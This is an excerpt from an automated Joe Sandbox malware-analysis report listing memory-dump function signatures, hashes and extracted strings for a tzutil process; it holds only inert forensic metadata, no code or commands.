                                                               • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-$0$0
                                                              • API String ID: 1302938615-699404926
                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction ID: 29bee05903f0b9c489afa29d1e83301e8890ea744e53d11dfb056b2c54d63905
                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction Fuzzy Hash: FB81F230E052499EDF24DF6CC8907FEBBBAAF853A0F1C455ADA61A7790C7348840CB50
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                               • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$[$]:%u
                                                              • API String ID: 48624451-2819853543
                                                              • Opcode ID: 96a2369b8ff59a22861c1eb2bd1e45e38e6695e08b30ead4bae1f0db083dd3f4
                                                              • Instruction ID: 64569121839c7c13f59cb41d4602275329642b33e7f86acc27ec9bd2011f37de
                                                              • Opcode Fuzzy Hash: 96a2369b8ff59a22861c1eb2bd1e45e38e6695e08b30ead4bae1f0db083dd3f4
                                                              • Instruction Fuzzy Hash: E0213E7AE04219AFDB10DF69D840AEEBBF8EF54654F48052AE915E7240E730DA018BA1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289956647.0000000003CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3cd0000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: XQcQ$X]_Q$gURU$uZPF$vA]X$w\F[$y[N]
                                                              • API String ID: 0-1416458366
                                                              • Opcode ID: dedf437aa38687259b1bad9c904173211a3205b851b084e00ad0a60b07b74ce9
                                                              • Instruction ID: 93f515bb7a9656b19501d33e5aea36d61d43acc06da155ccdca8d077c636fbc5
                                                              • Opcode Fuzzy Hash: dedf437aa38687259b1bad9c904173211a3205b851b084e00ad0a60b07b74ce9
                                                              • Instruction Fuzzy Hash: CE31E2B091038CEBCB05CF94D5846DEBBB1FF04389F858559E81A6F250C771865ACB8A
                                                              Strings
                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 03A202BD
                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 03A202E7
                                                              • RTL: Re-Waiting, xrefs: 03A2031E
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                               • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                              • API String ID: 0-2474120054
                                                              • Opcode ID: 9fc6eeedfe7136a172def5135d0e2eff5072a13a588cf694ce289b410c1d3e81
                                                              • Instruction ID: c07ac4809b6b4a1e70d4ebd1cd3ec57347f97637f6f9c7d42350c7d51c5abbbf
                                                              • Opcode Fuzzy Hash: 9fc6eeedfe7136a172def5135d0e2eff5072a13a588cf694ce289b410c1d3e81
                                                              • Instruction Fuzzy Hash: 21E1CE356087419FD724CF28C886B6ABBE4BF84314F188A5EF5A78B2E0D774D845CB52
                                                              Strings
                                                              • RTL: Resource at %p, xrefs: 03A27B8E
                                                              • RTL: Re-Waiting, xrefs: 03A27BAC
                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03A27B7F
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                              • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 0-871070163
                                                              • Opcode ID: 5375d716f4fa3cf33ad4347460f2c835d9520f7f2b9f8fcf87369b626edbb525
                                                              • Instruction ID: c74d6ca493b7d0090b902cad498a6eb2e05fb9ec327678afb9d93abc401d085b
                                                              • Opcode Fuzzy Hash: 5375d716f4fa3cf33ad4347460f2c835d9520f7f2b9f8fcf87369b626edbb525
                                                              • Instruction Fuzzy Hash: 134103357087029FDB25DF68C840B2AB7E9EF89710F040E1EF95ADB281DB31E9058B91
                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03A2728C
                                                              Strings
                                                              • RTL: Resource at %p, xrefs: 03A272A3
                                                              • RTL: Re-Waiting, xrefs: 03A272C1
                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03A27294
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                              • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-605551621
                                                              • Opcode ID: dac56e871387d749e5562efaa6321cd89e586bd9a0e13a8820dff58993d26a86
                                                              • Instruction ID: 4f2bd707d625b753505fb7360e6b5985b945bc6efdf6009682ddbf1068175f8b
                                                              • Opcode Fuzzy Hash: dac56e871387d749e5562efaa6321cd89e586bd9a0e13a8820dff58993d26a86
                                                              • Instruction Fuzzy Hash: 8F410F36704312AFD725CF28CC41B6ABBA9FB85710F140A1AF955EB281DB31E91287D0
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                              • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$]:%u
                                                              • API String ID: 48624451-3050659472
                                                              • Opcode ID: b9de2f8928dc9fc26efd3b546d015652323094a870755454ee9af6aa860dd6eb
                                                              • Instruction ID: 3340ed3e1d912f67a3f655290ccddcf32b2b3a6167cb10efecc136686b980f3d
                                                              • Opcode Fuzzy Hash: b9de2f8928dc9fc26efd3b546d015652323094a870755454ee9af6aa860dd6eb
                                                              • Instruction Fuzzy Hash: E8317876A006199FDB20DF29DC40BEEB7F8EF84650F44455BE849E7240EB30AA458FA0
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                              • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-
                                                              • API String ID: 1302938615-2137968064
                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                              • Instruction ID: 3bd80cc09369b84e11ab9f2d4b46a823bec1d61cdd84bbcee08d76b15e16caeb
                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                              • Instruction Fuzzy Hash: 6B91B471E0021A9FDF24DEA9C880AFEB7A9EF443E4F5C461AEA65E72D0D73099418710
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                              • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $$@
                                                              • API String ID: 0-1194432280
                                                              • Opcode ID: 6abeea13fef1617b30e3bb54aeebcf48788a6cc8e84972cabd82d81fb513a9b8
                                                              • Instruction ID: bff6f11a663da687e051f33a9475678c441a4013675a615eab858978a85875f8
                                                              • Opcode Fuzzy Hash: 6abeea13fef1617b30e3bb54aeebcf48788a6cc8e84972cabd82d81fb513a9b8
                                                              • Instruction Fuzzy Hash: 5B814C75D102699BDB31DB54CD44BEEB7B8AF48750F0445EAEA19B7280E7309E80CFA0